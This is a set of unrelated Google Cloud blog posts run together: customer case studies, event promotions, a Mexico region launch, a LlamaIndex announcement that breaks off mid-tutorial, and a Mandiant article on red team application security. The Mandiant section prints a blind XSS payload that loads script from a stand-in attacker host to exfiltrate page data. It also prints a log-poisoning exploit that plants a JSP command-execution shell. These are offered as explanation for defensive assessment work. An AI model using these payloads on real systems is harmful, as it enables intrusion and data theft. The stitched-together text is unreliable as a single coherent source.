“By harnessing Google Cloud’s solutions, such as GKE and Cloud TPU, Moloco dramatically reduced ML training times by up to tenfold.”–Sechan Oh, Director of Machine Learning, Moloco
This in turn facilitated swift model iteration and experimentation, empowering Moloco’s engineers to innovate with unprecedented speed and efficiency. Moreover, the scalability and performance of Google Cloud’s infrastructure enabled Moloco to manage increasingly intricate models and expansive datasets, to create and implement cutting-edge machine learning solutions. Notably, Moloco’s low-latency advertising experiences, bolstered by GPUs, fostered enhanced customer satisfaction and retention.
Moloco’s success demonstrates the power of Google Cloud’s solutions to help businesses achieve their full potential. By leveraging GKE, Cloud TPU, and GPUs, Moloco was able to scale its infrastructure, accelerate its ML training, and deliver exceptional ad experiences to its customers. As Moloco continues to grow and innovate, Google Cloud will remain a critical partner in its success.
Meanwhile, GKE is transforming the AI and ML landscape by offering a blend of scalability, flexibility, cost-efficiency, and performance. And Google Cloud continues to invest in GKE so it can handle even the most demanding AI training workloads. For example, GKE now supports 65,000-node clusters, offering unmatched scale for training or inference. For more, watch this demo of 65,000 nodes on a single GKE cluster.
Based on your feedback, Partner Summit 2025 will begin on Tuesday, April 8 – one day before Google Cloud Next kicks off – to offer a dedicated day of partner breakout sessions and learning opportunities before the main event begins. The Partner Summit Lounge, partner keynote, lightning talks, and more will all be available April 9–11, 2025.
Partner Summit is your exclusive opportunity to:
Accelerate your business by aligning on joint business goals, learning about new programmatic and incentive opportunities, and diving deep into cutting-edge insights in our Partner Summit breakout sessions and lightning talks.
Build new connections as you network with other partners and Googlers while you explore the activities and perks located in our exclusive Partner Summit Lounge.
Get a look at what’s next from Google Cloud leadership at the dedicated partner keynote to learn about where cloud is headed – and how our partners are central to our mission.
Make the most of our partnership with personalized advice from Google Cloud team members on incentives, certifications, co-marketing, and more at our Meet the Experts booths.
Get ready to learn, connect, and build the future of business with us. Early bird registration is now open for $999. This special rate is only available through February 14, 2025, or until tickets are sold out.
Google Cloud Next returns to Las Vegas, April 9–11, 2025*, and I’m thrilled to share that registration is now live! We welcomed 30,000 attendees to our largest flagship conference in Google Cloud history this past April, and 2025 will be bigger and better than ever.
Join us for an unforgettable week of hands-on experiences, inspiring content, and problem-solving with our top partners, and seize the opportunity to learn from top experts and peers tackling the same challenges you face day in and day out. Walk away with new ideas, breakthrough skills, and actionable knowledge only available at Google Cloud Next 2025.
Early bird registration is now available for just $999 for a limited time**.
Here’s why you need to be at Next:
Experience AI in Action: Immerse yourself in the latest technology; build your next agent; explore our demos, hackathons, and workshops; and learn how others are harnessing the power of AI to propel their businesses to new heights.
Forge Powerful Connections: Network with peers, industry experts, and the brightest minds in tech to exchange ideas, spark collaborations, and shape the future of your industry.
Build and Learn Live: With a wealth of demos and workshops, hackathons, keynotes, and deep dives, Next is the place to be for the builders, dreamers, and doers shaping the future of technology.
* Select programming to take place in the afternoon of April 8. ** Space is limited, and this offer is only valid through 11:59 PM PT on February 14, 2025, or until tickets are sold out.
Through our collaboration, the Air Force Research Laboratory (AFRL) is leveraging Google Cloud’s cutting-edge artificial intelligence (AI) and machine learning (ML) capabilities to tackle complex challenges across various domains, from materials science and bioinformatics to human performance optimization. AFRL, the center for scientific research and development for the U.S. Air Force and Space Force, is embracing the transformative power of AI and cloud computing to accelerate its mission of developing and transitioning advanced technologies to the air, space, and cyberspace forces.
This collaboration not only enhances AFRL’s research capabilities, but also aligns with broader Department of Defense (DoD) initiatives to integrate AI into critical operations, bolster national security, and maintain technological advantage by demonstrating game-changing technologies that enable technical superiority and help the Air Force adopt cutting-edge technologies as soon as they are released. By harnessing Google Cloud’s scalable infrastructure, comprehensive generative AI offerings, and collaborative environment, the AFRL is driving innovation and ensuring the U.S. Air Force and Space Force remain at the forefront of technological advancement.
Let’s delve into examples of how the AFRL and Google Cloud are collaborating to realize the benefits of AI and cloud services:
Bioinformatics breakthroughs: The AFRL’s bioinformatics research was once hindered by time-consuming manual processes and data bottlenecks, causing delays in moving and sharing data, getting access to US-based tools, using standard storage and hardware, and establishing the right system communications and integrations across third-party infrastructure. Because of this, cross-team collaboration and experiment expansion were severely limited and inefficiently tracked. With very little cloud experience, the team was able to create a siloed environment in which they used Google Cloud infrastructure such as Google Compute Engine, Cloud Workstations, and Cloud Run to build analytic pipelines that helped them test, store, and analyze data in an automated and streamlined way. That data pipeline automation paved the way for further exploration and expansion of a use case that had never been attempted before.
Web app efficiency for lab management: The AFRL’s complex lab equipment scheduling process made it challenging to provide scalable, secure access to important content and information for users in different labs. To mitigate these challenges and ease maintenance for non-programmer researchers and lab staff, the team built a custom web application based on Google App Engine, integrated with Google Workspace and Apps Script, so that they could capture usage metrics for future hardware investment decisions and automate admin tasks that were taking time away from research. The result was the ability to make changes significantly faster without administrator intervention, a variety of self-service options for users to schedule time on equipment and request training, and an enhanced, scalable design architecture with built-in SSO that helped streamline internal content for multiple labs.
Modeling insights into human performance: Understanding and optimizing human performance is critical for the AFRL’s mission. The FOCUS Mission Readiness App, built on Google Cloud, utilizes infrastructure services such as Cloud Run, Cloud SQL, and GKE, and integrates with the Garmin Connect APIs to collect and analyze real-time data from wearables.
By leveraging Google Cloud’s BigQuery and other analytics tools, this app provides personalized insights and recommendations for fatigue interventions and predictions that help capture valuable improvement mechanisms in cognitive effectiveness and overall well-being for Airmen.
Streamlined AI model development with Vertex AI
The AFRL wanted to replicate the functionality of university HPC clusters, especially since there was a diversity of users that needed extra compute and not everyone was trained on how to use these tools. They wanted an easy GUI and to maintain active connections where they could develop AI models and test their research with confidence. They leveraged Google Cloud’s Vertex AI and Jupyter Notebooks through Workbench, Compute Engine, Cloud Shell, Cloud Build and much more to get a head start in creating a pipeline that could be used for sharing, ingesting, and cleaning their code. Having access to these resources helped create a flexible environment for researchers to do model development and testing in an accelerated manner.
Cloud capabilities and AI/ML tools provide a flexible and adaptable environment that empowers our researchers to rapidly prototype and deploy innovative solutions. It’s like having a toolbox filled with powerful AI building blocks that can be combined to tackle our unique research challenges.
Dr. Dan Berrigan
Air Force Research Laboratory
The AFRL’s collaboration with Google Cloud exemplifies how AI and cloud services can be a driving force behind innovation, efficiency, and problem-solving across agencies. As the government continues to invest in AI research and development, collaborations like this will be crucial for unlocking the full potential of AI and cloud computing, ensuring that agencies across the federal landscape can leverage these transformative technologies to create a more efficient, effective, and secure future for all.
Learn more about how we’ve helped government agencies accelerate their mission and impact with AI.
Watch the Google Public Sector Summit On Demand to gain crucial insights on the critical intersection of AI and Security in the public sector.
Written by: Ilyass El Hadi, Louis Dion-Marcil, Charles Prevost
Executive Summary
Whether through a comprehensive Red Team engagement or a targeted external assessment, incorporating application security (AppSec) expertise enables organizations to better simulate the tactics and techniques of modern adversaries. This includes:
Leveraging minimal access for maximum impact: There is no need for high privilege escalation. Red Team objectives can often be achieved with limited access, highlighting the importance of securing all internet-facing assets.
Recognizing the potential of low-impact vulnerabilities through vulnerability chaining: Low- and medium-impact vulnerabilities can be exploited in combination to achieve significant impact.
Developing your own exploits: Skilled adversaries or consultants will invest the time and resources to reverse-engineer and/or find zero-day vulnerabilities in the absence of public proof-of-concept exploits.
Employing diverse skill sets: Red Team members should include individuals with a wide range of expertise, including AppSec.
Fostering collaboration: Combining diverse skill sets can spark creativity and lead to more effective attack simulations.
Integrating AppSec throughout the engagement: Offensive application security contributions can benefit Red Teams at every stage of the project.
By embracing this approach, organizations can proactively defend against a constantly evolving threat landscape, ensuring a more robust and resilient security posture.
Introduction
In today’s rapidly evolving threat landscape, organizations find themselves engaged in an ongoing arms race against increasingly sophisticated cyber criminals and nation-state actors. To stay ahead of these adversaries, many organizations turn to Red Team assessments, simulating real-world attacks to expose vulnerabilities before they are exploited. However, many traditional Red Team assessments typically prioritize attacking network and infrastructure components, often overlooking a critical aspect of modern attack surfaces: web applications.
This gap hasn’t gone unnoticed by cyber criminals. In recent years, industry reports consistently highlight the evolving trend of attackers exploiting public-facing application vulnerabilities as a primary entry point into organizations. This aligns with Mandiant’s observations of common tactics used by threat actors, as observed in our 2024 M-Trends Report: “In intrusions where the initial intrusion vector was identified, 38% of intrusions started with an exploit. This is a six percentage point increase from 2022.”
The 2024 M-Trends Report also documents that 28.7% of Initial Compromise access is obtained through exploiting public-facing web applications (MITRE T1190).
Figure 1: Initial Compromise statistics from the M-Trends report
At Mandiant, we recognize this gap and are committed to closing it by integrating AppSec expertise into our Red Team assessments. This optional approach is offered to customers who wish to increase the coverage of their external perimeter to gain a deeper understanding of their security posture. While most of the infrastructure typically receives a considerable amount of security scrutiny, web applications and edge devices often lack the same level of consideration, making them prime targets for attackers.
This integrated approach is not limited to full-scope Red Team engagements. Organizations with varying maturity levels can also leverage application security expertise within the context of focused external perimeter assessments. These assessments provide a valuable and cost-effective way to gain insights into the security of internet-facing applications and systems, without the need for a Red Team exercise.
The Role of Application Security in Red Team Assessments
The integration of AppSec specialists into Red Team assessments manifests in a unique staffing approach. The role of this specialist is to augment the Red Team’s capabilities with the ever-evolving exploitation techniques used by adversaries to breach organizations from the external perimeter.
The AppSec specialist will often get involved as early as possible on an engagement, even during the scoping and early planning stages. They perform a meticulous review of the target perimeter, mapping out the various application inventory and identifying vulnerabilities within the various components of web applications and application programming interfaces (APIs) exposed to the internet.
While examination is underway, Red Team operators concurrently focus on other crucial aspects of the assessment, including infrastructure preparation, crafting convincing phishing campaigns, developing and refining tools, and creating effective payloads that will evade the target environment’s controls and defense mechanisms.
Once an AppSec vulnerability of critical impact is discovered, the team will generally proceed to its exploitation, notifying our primary point of contact of our preliminary findings and validating the potential impacts of our discovery. It is important to note that a successful finding doesn’t always result in a direct foothold in the target environment. The intelligence gathered through the extensive reconnaissance and perimeter review phase can be repurposed for various aspects of the Red Team mission. This could include:
Identifying valuable reconnaissance targets or technologies to fine-tune a social engineering campaign
Further tailoring an attack payload
Establishing a temporary foothold that might lead to further exploitation
Hosting malicious payloads for later stages of the attack simulation
Once the external perimeter examination phase is complete, our Red Team operators will begin carrying out the remaining mission objectives, empowered with the AppSec team’s insights and intelligence, including identified vulnerabilities and associated exploits. Even though the Red Team operators perform most of the remaining activities at this point, the AppSec consultants stay close to the engagement and often step in to further support internal exploitation efforts. For example, applications that are only accessible internally generally get far less scrutiny and are consequently assessed much less frequently than externally accessible assets.
By incorporating AppSec expertise, we’ve achieved a significant increase of engagements where our Red Team successfully gained a significant advantage during a customer’s external perimeter review, such as obtaining a foothold or gaining access to confidential information. This overall approach translates to a more realistic and valuable assessment for our customers, ensuring comprehensive coverage of both network and application security risks. By uncovering and addressing vulnerabilities across the entire attack surface, Mandiant empowers organizations to proactively defend against a wide array of threats, strengthening their overall security posture.
Case Studies: Demonstrating the Impact of Application Security Support
In this section, we focus on four of the multiple real-world scenarios where the support of Mandiant’s AppSec Team has significantly enhanced the effectiveness of Red Team assessments. Each case study highlights the attack vectors, the narrative behind the attack, key takeaways from the experience, and the associated assumptions and misconceptions.
These case studies highlight the value of incorporating application security support in Red Team engagements, while also offering valuable learning opportunities that promote collaboration and knowledge sharing.
Unlocking the Vault: Exposed API Key to Sensitive Internal Document Access
Context
A company in the energy sector engaged Mandiant to assess the efficiency of its cybersecurity team’s abilities in detection, prevention, and response. Because the organization had grown significantly in the past years following multiple acquisitions, Mandiant suggested an increased focus on their external perimeter. This would allow the organization to measure the subsidiaries’ external security posture, compared to the parent organization’s.
Target of Interest
Following a thorough reconnaissance phase, the AppSec Team began examination of a mobile application developed by the customer for its business partners. Once the mobile application was decompiled, a hardcoded API key granting unauthorized access to an external API service was discovered. Leveraging the API key, authenticated reconnaissance on the API service was conducted, which led to the discovery of a significant vulnerability within the application’s PDF generation feature: a full-read Server-Side Request Forgery (SSRF), enabled through HTML injection.
Vulnerability Identification
During the initial reconnaissance phase, the team observed that numerous internal systems’ hostnames were publicly accessible through certificate transparency logs. With that in mind, the objective was to exploit the SSRF vulnerability to determine if any of these internal systems were reachable via the external API service. Eventually, one such host was identified: a commercial ASP.NET document management solution. Once the solution’s name and version were identified, the AppSec Team searched for known vulnerabilities online. Among the findings was a recent CVE entry regarding insecure ViewState deserialization, which included details about the affected dynamic-link library (DLL) name.
Exploitation
With no public proof-of-concept exploit available, the team searched for the DLL without success until the file was found in VirusTotal's public corpus. The DLL was then decompiled into C# code, revealing the vulnerable function and providing all the necessary components for successful exploitation. Next, the application security consultants leveraged the post-authentication SSRF vector to exploit the ViewState deserialization vulnerability affecting the internal application. This attack chain led to a reliable foothold in the parent organization's internal network.
Figure 2: HTML to PDF Server-Side Request Forgery to deserialization
Takeaways
The organization’s demilitarized zone (DMZ) was now breached, and the remote access could be passed off to the Red Team operators. This enabled the operators to perform lateral movement into the network and achieve various predetermined objectives. However, the customer expressed high satisfaction with the demonstrated impact prior to lateral movement, especially since the application server housed numerous sensitive documents. This underscores a common misconception that exploiting the external perimeter must necessarily result in facilitating lateral movement within the internal network. Yet, the impact was evident even before lateral movement, simply by gaining access to the customer’s sensitive data.
Breaking Barriers: Blind XSS as a Gateway to Internal Networks
Context
A company operating in the technology industry engaged Mandiant for a Red Team assessment. This company, with a very mature security program, requested that no phishing be performed because they were already conducting numerous internal phishing and vishing exercises. They highlighted that all previous Red Team engagements had relied heavily on various social engineering methods, and the success rate was consistently low.
Target of Interest
During the external reconnaissance efforts, the AppSec Team identified multiple targets of interest, such as a custom-built customer relationship management (CRM) solution. Leveraging the Wayback Machine on the CRM hostname, a legacy endpoint was discovered, which appeared obsolete but still accessible without authentication.
Vulnerability Identification
Despite not being accessible through the CRM's user interface, the endpoint contained a functional form to request support. The AppSec Team injected a blind cross-site scripting (XSS) payload into the form, which loaded an external JavaScript file containing post-exploitation code. When successful, this method temporarily hijacks the targeted user's browser tab, allowing the attacker to perform actions on the user's behalf. Moments later, the team received a notification that the payload had successfully executed within the context of a user browsing an internal customer support administration panel.
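As an illustration of the technique, a blind XSS probe typically plants a script tag that phones home when rendered; the endpoint, field names, and attacker host below are hypothetical:

import requests

# Hypothetical legacy form endpoint; the payload loads attacker-hosted JavaScript
# that exfiltrates the DOM and issues a callback when it executes in a victim's browser.
payload = '"><script src="https://attacker.example/hook.js"></script>'
requests.post(
    "https://crm.example.com/legacy/support",
    data={"subject": "order question", "message": payload},
)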
The AppSec Team analyzed the exfiltrated Document Object Model (DOM) to further understand the payload's execution context and assess the data accessible within this internal application. The analysis revealed references to version 3 of the Apache Tapestry framework, initially released in 2004. Shortly after identifying the internal application's framework, Mandiant deployed a local Tapestry v3 instance to identify potential security pitfalls. Through code review, Mandiant discovered a zero-day deserialization vulnerability in the core framework, which led to remote code execution (RCE). The Apache Software Foundation assigned CVE-2022-46366 to this RCE.
Exploitation
The zero-day, which affected the internal customer support application, was exploited by submitting an additional blind XSS payload. Crafted to trigger upon form submission, the payload autonomously executed in an employee’s browser, exploiting the internal application’s deserialization flaw. This led to a crucial foothold within the client’s infrastructure, enabling the Red Team to progress with their lateral movement until all objectives were successfully accomplished.
Figure 3: Remote code execution staged with blind cross-site scripting
Takeaways
This real-world scenario highlights a common misconception that cross-site scripting holds minimal relevance in Red Team assessments. The significance and impact of this particular attack vector in this case study were evident: it acted as a gateway, breaching the external network and leveraging an employee’s internal network position as a proxy to exploit the internal application. Mandiant had not previously identified XSS vulnerabilities on the external perimeter, which further highlights how the security posture of the external perimeter can be much more robust than that of the internal network.
Logger Danger: From Log Files to Unauthorized Cloud Access
Context
An organization in the transportation sector engaged Mandiant to perform a Red Team assessment, with the goal of emulating an initial access broker (IAB) threat group focused on breaching externally exposed systems and services. These groups, which typically resell illegitimate access to compromised victims' environments, had previously been identified as a significant threat to the organization by the Google Threat Intelligence (GTI) team while building a threat profile to support assessment activities.
Target of Interest
Among hundreds of external applications identified during the reconnaissance phase, one stood out: a commercial Java-based supply chain management solution hosted in the cloud. This application drew additional attention after the discovery of an online forum post describing its installation procedures. Within the post, a link to an unlisted YouTube video was shared, offering detailed installation and administration guidance. Upon reviewing the video, the AppSec Team noted the URL for the application's trial installer, still accessible online despite not being referenced or indexed anywhere else.
Following installation and local deployment, an administration manual was available within the installation folder. This manual contained a section on a web-based performance monitor plugin that was deployed by default with the application, along with its default credentials. The plugin's functionality included logging performance metrics and stack traces to local files upon encountering unhandled errors. Furthermore, the plugin's endpoint name was distinctive, making it highly unlikely to be discovered through conventional directory brute-forcing.
Vulnerability Identification
The AppSec Team successfully logged into the organization's performance monitor plugin using the default credentials sourced from the administration manual, then resumed local testing to identify post-authentication vulnerabilities. Conducting code review in parallel with manual testing, the team identified a log management feature that allowed authenticated users to manipulate log filenames and directories. The team also observed that it could induce errors through targeted, malformed HTTP requests. In conjunction with the log filename manipulation, it was possible to force arbitrary data to be stored at an arbitrary location on the underlying server's file system.
Exploitation
The strategy involved intentionally triggering exceptions, which the performance monitor would then log in an attacker-defined Jakarta Server Pages (JSP) file within the web application’s root directory. The AppSec Team crafted an exploit that injected arbitrary JSP code into an HTTP request’s parameter, forcing the performance monitor to log errors into the attacker-controlled JSP file. Upon accessing the JSP log file, the injected code executed, enabling Mandiant to breach the customer’s cloud environment and access thousands of sensitive logistics documents.
Figure 4: Remote code execution through log file poisoning
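A simplified sketch of this log-poisoning chain follows; the endpoints and parameter names are hypothetical stand-ins for the plugin's log management and error handling features:

import requests

s = requests.Session()
# Authenticate with the default credentials from the administration manual (omitted).

# 1. Redirect the log file into the web root with a .jsp extension (hypothetical params).
s.post("https://target.example.com/monitor/log-config",
       data={"log_dir": "../../webapps/ROOT", "log_file": "diag.jsp"})

# 2. Trigger an unhandled error whose request data, containing JSP code, is logged verbatim.
jsp = '<%= new String(Runtime.getRuntime().exec(request.getParameter("c")).getInputStream().readAllBytes()) %>'
s.get("https://target.example.com/monitor/metrics", params={"id": jsp})

# 3. Request the poisoned "log file"; the server compiles and executes the injected JSP.
print(s.get("https://target.example.com/diag.jsp", params={"c": "id"}).text)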
Takeaways
A common assumption that breaches should lead to internal on-premises network access or to Active Directory compromise was challenged in this case study. While lateral movement was constrained by time, the primary objective was achieved: emulating an initial access broker. This involved breaching the cloud environment, where the client lacked visibility compared to its internal Active Directory network, and gaining access to business-critical crown jewels.
Collaborative Intrusion: Webhooks to CI/CD Pipeline Access
Context
A company in the automotive sector engaged Mandiant to perform a Red Team assessment, with the goal of obtaining access to their continuous integration and continuous delivery/deployment (CI/CD) pipeline. Due to the sheer number of externally exposed systems, the AppSec Team was staffed to support the Red Team’s reconnaissance and breaching efforts.
Target of Interest
Most of the interesting applications redirected to the customer's single sign-on (SSO) provider. However, one application behaved differently. By querying the Wayback Machine, the team uncovered an endpoint that did not redirect to the SSO. Instead, it presented a blank page with a unique favicon. With the goal of identifying the application's underlying technology, the favicon's hash was calculated and queried using Shodan. The results returned many other live applications sharing the same favicon. Interestingly, some of these applications operated independently of SSO, aiding the team in identifying the application's name and vendor.
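Favicon pivoting works because Shodan indexes a MurmurHash3 fingerprint of the base64-encoded icon; computing the same fingerprint locally lets you find every indexed host serving that icon. A minimal sketch, with a placeholder URL:

import base64
import mmh3
import requests

# Fetch the favicon and compute the Shodan-style MurmurHash3 fingerprint.
favicon = requests.get("https://app.example.com/favicon.ico").content
fingerprint = mmh3.hash(base64.encodebytes(favicon))  # encodebytes keeps the newlines Shodan expects

# Paste this query into Shodan to find other hosts serving the same favicon.
print(f"http.favicon.hash:{fingerprint}")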
Vulnerability Identification
Once the application’s name was identified, the team visited the vendor’s website and accessed their public API documentation. Among the API endpoints, one stood out—it could be directly accessed on the customer’s application without redirection to the SSO. This API endpoint did not require authentication and only took an incremental numerical ID as its parameter’s value. Upon querying, the response contained sensitive employee information, including email addresses and phone numbers. The team systematically iterated through the API endpoint, incrementing the ID parameter to compile a comprehensive list of employee email addresses and phone numbers. However, the Red Team refrained from leveraging this data, as another intriguing application was discovered. This application exposed a feature that could be manipulated into sending fully user-controlled emails from the company’s no-reply@ email address.
Capitalizing on these vulnerabilities, the Red Team initiated a phishing campaign, successfully gaining a foothold in the customer’s network before the AppSec Team could identify an external breach vector. As efforts continued on the internal post-exploitation, the application security consultants shifted their focus to support the Red Team’s efforts within the internal network.
Exploitation
Digging into network shares, the Red Team found credentials for a developer account on an enterprise source control application. The AppSec Team sifted through reconnaissance data and flagged that the same source control application server was exposed externally. The credentials were successfully used to log in, as multi-factor authentication was absent for this user. Within the GitHub interface, the team uncovered a pre-defined webhook linked to the company's internal Jenkins—an integration commonly employed to facilitate communication between source control systems and CI/CD pipelines. Leveraging this discovery, the team created a new webhook. When manually triggered by the team, this webhook would perform an SSRF to internal URLs. This eventually led to the exploitation of an unauthenticated Jenkins sandbox bypass vulnerability (CVE-2019-1003030), and ultimately to remote code execution, effectively compromising the organization's CI/CD pipeline.
Figure 5: External perimeter breach via CI/CD SSRF
Takeaways
In this case study, the efficacy of collaboration between the Red Team and the AppSec Team was demonstrated. Leveraging insights gathered collectively, the teams devised a strategic plan to achieve the main objective set by the customer: accessing its CI/CD pipelines. Moreover, we challenged the misconception that a single critical vulnerability is indispensable for reaching objectives. Instead, we showed that achieving goals often requires innovative detours: a combination of vulnerabilities or misconfigurations, whether discovered by the AppSec Team or the Red Team, can be strategically chained together to accomplish the mission.
Conclusion
As this blog post demonstrated, the integration of application security expertise into Red Team assessments yields significant benefits for organizations seeking to understand and strengthen their security posture. By proactively identifying and addressing vulnerabilities across the entire attack surface, including those commonly overlooked by traditional approaches, businesses can minimize the risk of breaches, protect critical assets, and hopefully avoid the financial and reputational damage associated with successful attacks.
This integrated approach is not limited to Red Team engagements. Organizations with varying maturity levels can also leverage application security expertise within the context of focused external perimeter assessments. These assessments provide a valuable and cost-effective way to gain insights into the security of internet-facing applications and systems, without the need for a Red Team exercise.
Whether through a comprehensive Red Team engagement or a targeted external assessment, incorporating application security expertise enables organizations to better simulate the tactics and techniques of modern adversaries.
Google Cloud is delighted to announce the opening of our 41st cloud region in Querétaro, Mexico. This marks our third cloud region in Latin America, joining Santiago, Chile, and São Paulo, Brazil. From Querétaro, we’ll provide fast, reliable cloud services to businesses and public sector organizations throughout Mexico and beyond. This new region offers low latency, high performance, and local data residency, empowering organizations to innovate and accelerate digital transformation initiatives.
Helping organizations in Mexico thrive in the cloud
Google Cloud regions are major investments to bring best-in-class infrastructure, cloud and AI technologies closer to customers. Enterprises, startups, and public sector organizations can leverage Google Cloud’s infrastructure economy of scale and global network to deliver applications and digital services to their end users.
With this new region in Querétaro, Mexico, Google Cloud customers enjoy:
Speed: Serve your end users with fast, low-latency experiences, and transfer large amounts of data between networks easily across Google’s global network.
Security: Keep your organizations’ and customers’ data secure and compliant, including meeting the requirements of CNBV contractual frameworks, and maintain local data residency.
Capacity: Scale to meet growing user and business needs.
Sustainability: Reduce the carbon footprint of your IT environment and help meet sustainability targets.
Google Cloud customers are eager to benefit from the new possibilities that this cloud region offers:
“At Prosa, we have been undergoing a transformation process for the past three years that involves adopting technology and developing digital skills within our teams. The partnership with Google has been key to carrying out projects, evolving towards digital business models, enabling the ecosystem, promoting the API-ification of services, and improving data analysis. This alliance is only deepened with the launch of the new Google Cloud region, which will facilitate the integration of participants into the payment ecosystem in a secure and highly available manner, improving the customer experience and delivering value more quickly and agilely,” said Salvador Espinosa, CEO of Prosa, a payment technology company that processed more than 10 million transactions in 2023.
The new Google Cloud region in Querétaro, Mexico has also been welcomed by the Mexican public sector.
“The new Google cloud region in Mexico will be key to build a digital government accountable to citizens, deepening our path to digital transformation. Since 2018, the Auditoria Superior de la Federación (ASF) has pioneered digital transformation in Mexico, promoting innovation and the responsible use of technology, while using advanced technologies like Google Cloud’s Vertex AI, among other proprietary tools, to enhance data analysis, automate processes, and improve collaboration. This enables more accurate decision-making, optimized oversight of public spending, increased inspection coverage, and transparent use of resources. Thanks to the cloud, we see a future where technology is a strategic ally to execute efficient, agile and exhaustive digital audits, detect irregularities early, and strengthen accountability. ASF’s focus on transparency and efficiency aligns with President Claudia Sheinbaum’s public innovation policy.” – Emilio Barriga Delgado, Special Auditor of Federalized Expenditure, Auditoria Superior de la Federación
The new cloud region also opens new opportunities for our global ecosystem of over 100,000 incredibly diverse partners.
“For Amarello and our customers, the availability of a new region in Mexico demonstrates the great growth of Google Cloud and its commitment to Mexico. It’s also a great milestone for the country, putting us on par with other economies. This will create jobs that will speed up our clients’ adoption of strategic projects and latency-sensitive technological services such as financial services or mission-critical operations. At the same time, the new region will enable projects that require information to be maintained within the national territory, now on the most innovative and secure public cloud.” – Mauricio Sánchez Valderrama, managing partner, Amarello Tecnologías de Información
And for global companies looking to tap into the Mexican market:
“As networks shift to a cloud-first approach, and hybrid work enables work from anywhere, businesses in the Mexico region can now securely accelerate innovation, boost efficiency, and enhance customer experiences with Palo Alto Networks AI-powered solutions, like Prisma SASE, built in the cloud to secure the cloud at scale. The powerful collaboration between Google Cloud and Palo Alto Networks reinforces our commitment to security and innovation so organizations can confidently embrace the AI-driven future, knowing their users, data, and applications are protected from evolving threats.” — Anupam Upadhyaya, Vice President, Product Management, Palo Alto Networks
Delivering on our commitment to Latin America
In 2022, we announced a five-year, $1.2 billion commitment to Latin America, focusing on four key areas: digital infrastructure, digital skills, entrepreneurship, and inclusive, sustainable communities.
We’re equally committed to creating new career opportunities for people in Mexico and Latin America: We’re working with over 550 universities across Latin America to offer a robust and continuously updated portfolio of learning resources so students can seize the opportunities created by new digital technologies like AI and the cloud. As a result, we’ve already granted more than 14,000 digital skill badges to students and individual developers in Mexico over the last 24 months.
Another example of our commitment is the “Súbete a la nube” program that we created in partnership with the Inter-American Development Bank (IDB), with a focus on women and the southern region of the country. To date, 12,500 people have registered for essential digital skills training in cloud computing through the program.
Today, we’re also announcing a commitment to train 1 million Mexicans in AI and cloud technologies over the coming years. Google Cloud will continue to skill Mexico’s local talent with a variety of no-cost training programs for students, developers and customers. Some of the ongoing training programs will include no-cost, localized courses available through YouTube, credentials through the Google Cloud Skills Boost platform, community support by Google Developer Groups, and scholarships for the Google Career Certificates that help prepare learners for high-growth, in-demand jobs in fields like cybersecurity and data analytics, so the cloud can truly democratize innovation and technology.
This new Google Cloud region is also a step towards providing generative AI products and services to Latin American customers. Cloud computing will increasingly be a key gateway towards the development and usage of AI, helping organizations compete and innovate at global scale.
Google Cloud is dedicated to being the partner of choice for customers undergoing digital transformation. We’re focused on providing sustainable, low-carbon options for running applications and infrastructure. Since 2017, we’ve matched 100% of our global annual electricity use with renewable energy. We’re aiming even higher with our 2030 goal: operating on 24/7 carbon-free energy across every electricity grid where we operate, including Mexico.
We’re incredibly excited to open the Querétaro, Mexico region, bringing low-latency, reliable cloud services to Mexico and Latin America, so organizations can take advantage of all that the cloud has to offer. Stay tuned for even more Google Cloud regions coming in 2025 (and beyond), and click here to learn more about Google Cloud’s global infrastructure.
AI agents are revolutionizing the landscape of gen AI application development. Retrieval augmented generation (RAG) has significantly enhanced the capabilities of large language models (LLMs), enabling them to access and leverage external data sources such as databases. This empowers LLMs to generate more informed and contextually relevant responses. Agentic RAG represents a significant leap forward, combining the power of information retrieval with advanced action planning capabilities. AI agents can execute complex tasks that involve multiple steps that reason, plan and make decisions, and then take actions to execute goals over multiple iterations. This opens up new possibilities for automating intricate workflows and processes, leading to increased efficiency and productivity.
LlamaIndex has emerged as a leading framework for building knowledge-driven and agentic systems. It offers a comprehensive suite of tools and functionality that facilitate the development of sophisticated AI agents. Notably, LlamaIndex provides both pre-built agent architectures that can be readily deployed for common use cases, as well as customizable workflows, which enable developers to tailor the behavior of AI agents to their specific requirements.
Today, we’re excited to announce a collaboration with LlamaIndex on open-source integrations for Google Cloud databases including AlloyDB for PostgreSQL and Cloud SQL for PostgreSQL.
These LlamaIndex integrations, available to download via PyPI as llama-index-alloydb-pg and llama-index-cloud-sql-pg, empower developers to build agentic applications that can connect with Google databases. The integrations include support for the Vector Store, Document Store, and Index Store interfaces.
In addition, developers can also access previously published LlamaIndex integrations for Firestore, including for Vector Store and Index Store.
Integration benefits
LlamaIndex supports a broad spectrum of different industry use cases, including agentic RAG, report generation, customer support, SQL agents, and productivity assistants. LlamaIndex’s multi-modal functionality extends to applications like retrieval-augmented image captioning, showcasing its versatility in integrating diverse data types. Through these use cases, joint customers of LlamaIndex and Google Cloud databases can expect to see an enhanced developer experience, complete with:
Streamlined knowledge retrieval: Using these packages makes it easier for developers to build knowledge-retrieval applications with Google databases. Developers can leverage AlloyDB and Cloud SQL vector stores to store and semantically search unstructured data to provide models with richer context. The LlamaIndex vector store integrations let you filter metadata effectively, select from vector similarity strategies, and help improve performance with custom vector indexes.
Complex document parsing: LlamaIndex’s first-class document parser, LlamaParse, converts complex document formats with images, charts and rich tables into a form more easily understood by LLMs; this produces demonstrably better results for LLMs attempting to understand the content of these documents.
Secure authentication and authorization: LlamaIndex integrations to Google databases utilize the principle of least privilege, a best practice, when creating database connection pools, authenticating, and authorizing access to database instances.
Fast prototyping: Developers can quickly build and set up agentic systems with readily available pre-built agent and tool architectures on LlamaHub.
Flow control: For production use cases, LlamaIndex Workflows provide the flexibility to build and deploy complex agentic systems with granular control of conditional execution, as well as powerful state management.
A report generation use case
Agentic RAG workflows are moving beyond simple question-and-answer chatbots. Agents can synthesize information across sources and knowledge bases to generate in-depth reports. Report generation spans many industries — from legal, where agents can do prework such as research, to financial services, where agents can analyze earnings call reports. Agents mimic experts who sift through information to generate insights. And even if agent reasoning and retrieval takes several minutes, automating these reports can save teams several hours.
LlamaIndex provides all the key components to generate reports:
Structured output definitions with the ability to organize outputs into Report templates
Intelligent document parsing to easily extract and chunk text and other media
Knowledge base storage and integration across the customer’s ecosystem
Agentic workflows to define tasks and guide agent reasoning
Now let’s see how these concepts work, and consider how to build a report generation agent that provides daily updates on new research papers about LLMs and RAG.
1. Prepare data: Load and parse documents
